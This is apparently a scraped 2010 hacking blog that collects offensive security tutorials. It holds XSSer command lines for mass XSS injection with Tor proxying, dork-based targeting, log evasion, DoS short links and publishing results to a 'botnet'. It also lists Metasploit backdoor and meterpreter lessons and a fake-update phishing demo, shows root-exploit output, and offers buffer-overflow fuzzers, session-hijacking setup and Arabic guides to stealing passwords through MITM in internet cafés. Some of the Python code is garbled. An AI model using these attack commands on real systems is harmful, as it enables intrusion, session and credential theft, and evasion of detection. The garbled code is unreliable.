XSSploit

Introduction :

XSSploit is a multi-platform Cross-Site Scripting scanner and exploiter written in Python. It has been developed to help discovery and exploitation of XSS vulnerabilities in penetration testing missions.

When used against a website, XSSploit first crawls the whole website and identifies encountered forms. It then analyses these forms to automatically detect existing XSS vulnerabilities as well as their main characteristics.

The vulnerabilities that have been discovered can then be exploited using the exploit generation engine of XSSploit. This extensible functionality allows choosing the desired exploit behaviour and automatically generates the corresponding HTML link embedding the exploit payload.

A video is available to explain how to use of XSSploit.

Requirements :

The following elements are required by XSSploit:

- Python 2.5
- wxPython GUI toolkit

Download : http://www.scrt.ch/outils/xssploit/Xssploit-0.5.tar.gz

Source : http://www.scrt.ch/pages_en/xssploit.html

[ TOOLS ] : XSSer

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

Usage

python XSSer.py [-u |-i |-d ] [-p |-g |-c ] [OPTIONS] [Request] [Bypassing] [Techniques]

Examples

* Simple injection from URL:

$ python XSSer.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python XSSer.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with fuzzing, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):

$ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --Fuzz --Hex --verbose -w
-------------------
* Multiple injections from URL, with fuzzing, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

$ python XSSer.py -u "http://host.com" --Fuzz --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:

$ python XSSer.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une

-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python XSSer.py --De "duck" -d "search.php?"

-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):

$ python XSSer.py -c3 --Cw=4 -u "http://host.com"

-------------------
* Simple injection from URL, using POST, with statistics results:

$ python XSSer.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s

-------------------
* Multiple injections from URL to a parameter sending with GET, using Fuzzing, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Fuzz --Doo --short tinyurl

-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Coo --Anchor --Fr="!enter your final injection code here!"

-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"

-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying Fuzzing, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):

$ python XSSer.py -i "list_of_url_targets.txt" --Fuzz --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"

-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.

$ pyton XSSer.py --Imx "test.png" --payload "!enter your malicious injection code here!"

-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.

$ python XSSer.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"

-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca
(federated XSS pentesting botnet)

$ python XSSer.py -d "login.php" --De "duck" --publish
http://xsser.sourceforge.net

Download : 
http://downloads.sourceforge.net/xsser/xsser-1.0b.tar.gz

Source :
http://xsser.sourceforge.net

METASPLOIT TRAINING V2

METASPLOIT TRAINING V2.0(2010) : BY PENTEST101 TEAM
BLOG : Pentest101.BlogSpot.Com


METASPLOIT FRAMEWORK :

Metasploit - Penetration Testing Resources
Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project managed by Rapid7.

official site :
    http://www.metasploit.com/


before we start this training :
- all this courses belong to pentest101 team .
- this courses , for educational purpose only .
- we are not responsible for any bad usage .
good , we can start noW .

You ArE FreE To SHARE the METASPLOIT TRAINING V2

------------auxiliary---------------
- auxiliary portscan
- auxiliary smb version
- auxiliary smb login check

------------hacking-xp--------------
- hacking xp sp3(bind)
- hacking xp sp3(reverse)
- hacking xp sp3(vncinject)

------------backdoors---------------
- make a backdoor : linux/x86
- make a backdoor (backdoor.py)
- encode a backdoor
- encode a backdoor (backdoor.py)
- make and encode a backdoor (with metasploit and sniff email u/p)
- script proback.py (backdoors for win32 linux osx)  

------------meterpreter-------------
- meterpreter commands
- Meterpreter (screensht and key_scan)
- meterpreter packet's sniffing
- meterpreter metscv

------------advanced-usage----------
- autopwn
- browser autopwn
- file autopwn
- java signed applet
- fake update msf and ettercap
- discovering and exploiting remote buffer overflow
- discovering and exploiting remote buffer overflow (egg-hunter)

DOWNLOAD LINK : http://www.megaupload.com/?d=HU32VOI0
PASSWORD : pentest101
you will help us by a small donation : http://pentest101.blogspot.com/p/donate.html
#Pentest101.blogspot.com .

[ METASPLOIT ] : JAVA-SIGNED-APPLET

[ METASPLOIT ] : java-signed-applet from Pentest101 Team on Vimeo.

apt-get install sun-java6-jdk
echo "JAVA_HOME=/usr/lib/jvm/java-6-sun" >> /etc/bash.bashrc
echo "export JAVA_HOME" >> /etc/bash.bashrc
JAVA_HOME=/usr/lib/jvm/java-6-sun
export JAVA_HOME
gem install rjb

Have Fun

[ BACKTRACK ] : FAKE UPDATE [ MSF , ETTERCAP ]

hi all,

FAKE UPDATE : MSF , ETTERCAP (demo)


FAKE UPDATE : MSF , ETTERCAP from Pentest101 Team on Vimeo.



HTML FAKE PAGE : http://pastebin.com/LPVardiq

[ BACKTRACK ] : HACKING METASPLOITABLE P1 P2.

PART1 :

metasploitable real hacking P1 from Pentest101 Team on Vimeo.

PART2 :

metasploitable real hacking P2 from Pentest101 Team on Vimeo.

metasploitable : http://www.metasploit.com/documents/express/Metasploitable.zip.torrent

[ METASPLOIT ] : FILE_AUTOPWN

hi all

server/file_autopwn


[ METASPLOIT ] : FILE_AUTOPWN from Pentest101 Team on Vimeo.

[ NEWS ] : offensive-security-hacking-tournament

Got the itch to hack something but don’t want to spend time in prison? Do you wish there was a legal way you could hack some servers just for fun? Then we have a challenge for you. Offensive Security Training is initiating its first ever “Open Hacking Tournament” , and as you can imagine, we’re not going to play fair.

What do you have to do to win this challenge? Use the Internet, use your skills, call your friends, heck, ask your mama – whatever it takes for you to hack our lab machines.

You will race against the clock and against other “hackers” to be the first to compromise all our lab servers, in a CTF style, “sudden death” tournament.

On the Table: One FREE, PWB OR CTP online course with 30 days of labs for the single winner.

On the Clock: The contest will commence between the 8th and 9th of May, 2010.
Job to be Done: Hack the living heck out of our challenge servers, and submit your documentation.
How to Win: Hack us the fastest.

more informations :

http://www.information-security-training.com/news/offensive-security-hacking-tournament/

[ NEWS ] : Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation

Author: Jon Oberheide
Usage:

$ python team-edward.py
[+] checking for reiserfs mount with user_xattr mount option
[+] checking for private xattrs directory at /.reiserfs_priv/xattrs
[+] preparing shell in /tmp
[+] capturing pre-shell snapshot of private xattrs directory
[+] compiling shell in /tmp
[+] setting dummy xattr to get reiserfs object id
[+] capturing post-shell snapshot of private xattrs directory
[+] found 1 new object ids
[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
[+] spawning setuid shell...
# id
uid=0(root) gid=0(root) groups=4(adm), ...

Notes:

Obviously requires a ReiserFS filesystem mounted with extended attributes.
Tested on Ubuntu Jaunty 9.10.
'''

http://www.exploit-db.com/exploits/12130

[ BUFFER OVERFLOW ] : metasploiT anD remotE buffeR overfloW (egg-hunter)

MSF & Remote Buffer Overflow (egg-hunter) from Pentest101 Team on Vimeo.

[NEWS] : Apple Safari | Tag (heap spray) Remote Buffer Overflow Exploit (osX)

safari : remote bof

Exploit Code : 

#!/usr/bin/env python
#######################################################
#
# Title: Apple Safari <= Tag (heap spray) Remote BOF Exploit (osX)
# Author: eidelweiss
# Special Thank`s to: AL-MARHUM - [D]eal [C]yber - all Senior MEDANHACKER
# Greats: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , kuris (good job beib
LOL)
# Tested on ibook OS X 10.4.11 (ibook g4)
#
#######################################################



http://securityreason.com/exploitalert/8022

[ EBOOKS ] : BUFFER OVERFLOW (EGG-HUNTER)

we have today a good book about egg-hunter technique
you can download it from here :

--- http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

this book is not mine.
email author : mmiller@hick.org

[ BUFFER OVERFLOW ] : metasploiT anD remotE buffeR overfloW

MSF & Remote buffer overflow from Pentest101 Team on Vimeo.

[ BACKTRACK ] : Paros Proxy ...

Paros Proxy ...

hi all ...



blip.tv

[ BACKTRACK ] : Maltego << information gathering >> ...

Maltego [ information gathering ] ...

hi all ...



blip.tv

[ BACKTRACK ] : bruteforcE routeR witH xhydrA ...

bruteforcE routeR witH xhydrA ...





blip.tv

[ METASPLOIT ] : meterpreteR as a servicE ...

meterpreter as a service ...
hi all ...

blip.tv

[ METASPLOIT ] : Packet Sniffing with Meterpreter ...

Packet Sniffing with Meterpreter ...



http://pentest101.blip.tv

[ METASPLOIT ] : searcH emaiL collectoR

searcH emaiL collectoR ... by mr-gefara (my friend)

http://p3ntest.blip.tv/

http://blip.tv/file/3171290

svn co http://www.metasploit.com/svn/framework3/trunk/modules/auxiliary/gather
cp -r gather /pentest/exploits/modules/auxiliary
go to msfconsole
search gather
use gather/search_email_collector
show options
set domain yoursite.com
run

[ METASPLOIT ] : changE youR meta BnneR

changE youR metasploiT banneR ...
hi,every one

wath tutorial :







blip.tv

[ PYTHON ] : local buFF fuzz tools

local buFF fuzzeR tools (python) ...
hi ,every one ...
To speed up your work
[+] fuzz1.py

#!/usr/bin/python
# coded by data$hack 2010
# usage : python fuzz1.py
import os
import sys
os.system("cls")
d = raw_input("badchar [exemple (A)] : ")
g = d
g += " * ? [exemple (15000)] : "
b = input(g)
s = raw_input("file extension [exemple (m3u)] : ")
a = '\x41' * b;
k = "EvilFile."
k += s
try:
fileHandle = open(k,'w')
fileHandle.write ( a )
fileHandle.close()
except:
print "error check something ..."
sys.exit("")
print "\nfile created succ ..."

[+] md5 maker :

import hashlib
import os
import string
os.system("cls")
d = input("give me a number : ")
k = 0
j = 0
while (k < d):
k = k + 32
j = j + 1
i = 0
cat = ""
while (i < j): i += 1 m = hashlib.md5() # don't forget to "import hashlib" m.update(str(i)) md5 = m.hexdigest() cat += md5 n = len(cat) while (n > d+1):
n = len(cat)
kl = cat[n-1]
cat = cat.rstrip(kl)
fileHandle = open ('md5.md5','w')
fileHandle.write ( cat )
fileHandle.close()

ftp fuzzer by pentest101 [very soon]
[*] finish ...
have fun ...

[ METASPLOIT ] : Add soundrecorder meterpreteR script to metasploit3 ...

Add soundrecorder meterpreteR script to metasploit3 ...
hi every one ...
[+] open terminal :

su
http://www.darkoperator.com/meterpreter/soundrecorder.zip
unzip soundrecorder.zip
cp soundrecorder/soundrecorder.rb /opt/metasploit3/msf3/scripts/meterpreter                              [your meta location]

cp soundrecorder/linco.exe /opt/metasploit3/msf3/data
cp soundrecorder/oggenc.exe /opt/metasploit3/msf3/data
meterpreter soundrecorder by pentest101 [here] ...
[*]  finish ...

[ HIJACKING ] : HTTP Session Hijacking Demo using Hamster and Ferret

[ VIDEOS ] : (2009)بعض شروحاتي

(2009)بعض شروحاتي

hi every one ...

 :

========1===========

اقوى الشروحات :شرح ال metasploit من بداية الاستغلال الى meterpreter commands

Download :

========2===========

شرح فيديو internet exp 7 memory corruption exploit [fast-track
الشرح اليوم من الشروحات المتقدمة وهو شرح لثغرة internet exp 7 memory corruption exploit

الادوات : fast-track and netcat

هذه الثغرة موجودة بالميتا  fast-track . ولاكن للاسراع قليلا تم الشرح بال

Download :

=======3===========

simple remote buffer over... exploitation

thx to corelan for the .c code

ستجدون الكود و الاستغلال مع الشرح
ان شاء الله يكون بداية لكم في ال : remote buffer overflow

Download :

=======4===========
نظرا للاستفسارات الكثيرة حول ال mitm او man in the midle .
حبيت اسوي شرح بسيط جدا ولاكن مهم جدا ببرنامج cain برنامج معروف عالميا .
و هذا الشرح يظهر كيفية سرقة الباسوردات من الشبكة ،مثلا تكون شابك من مقهى انترنات يكون هناك العديد من الضحاية ,تكون انت في الوسط تقوم بعملك .
الشرح لغرض تعليمي فقط .

Download :

========fin=========

[ METASPLOIT ] : encode backdoor and sniffing

hi every one
make and encryption backdoor (with metasploit and sniff email username/password)

arabic:
صنع و تشفير backdoor

and sniff email

have fun (*_*)

blip.tv

[ LINUX ] : install hamster in ubuntu (sidejacking attack)

install hamster in ubuntu (sidejacking attack) :

[*] open terminal

sudo su

apt-get install libpcap-dev

-----if you don't have a [pentest folder make one]

cd /

mkdir pentest

cd /pentest

wget http://hamster.erratasec.com/downloads/hamster-2.0.0.zip

unzip hamster-2.0.0.zip

mv hamster hamster2

cd hamster2/build/gcc4

make

cd /pentest/ferret/build/gcc4

make

cd /pentest

mkdir hamster

cp /pentest/ferret/bin/ferret /pentest/hamster

cp /pentest/hamster2/bin/favicon.ico /pentest/hamster

cp /pentest/hamster2/bin/hamster /pentest/hamster

cp /pentest/hamster2/bin/hamster.css /pentest/hamster

cp /pentest/hamster2/bin/hamster.js /pentest/hamster

cd /pentest

rm -rf ferret

rm -rf hamster2

rm -f hamster-2.0.0.zip

scrpit to install hamster  [very soon] by pentest101

HTTP Session hijacking  [here] by pentest101

[*] finish

[ Penetration Testing ]

A penetration test is a method of evaluating the security of a computer system or network by simulating an attack from a malicious source, known as a Black Hat Hacker, or Cracker. The process involves an active analysis of the system for any potential vulnerabilities that may result from poor or improper system configuration, known and/or unknown hardware or software flaws, or operational weaknesses in process or technical countermeasures. This analysis is carried out from the position of a potential attacker, and can involve active exploitation of security vulnerabilities. Any security issues that are found will be presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution. The intent of a penetration test is to determine feasibility of an attack and the amount of business impact of a successful exploit, if discovered. It is a component of a full security audit.

source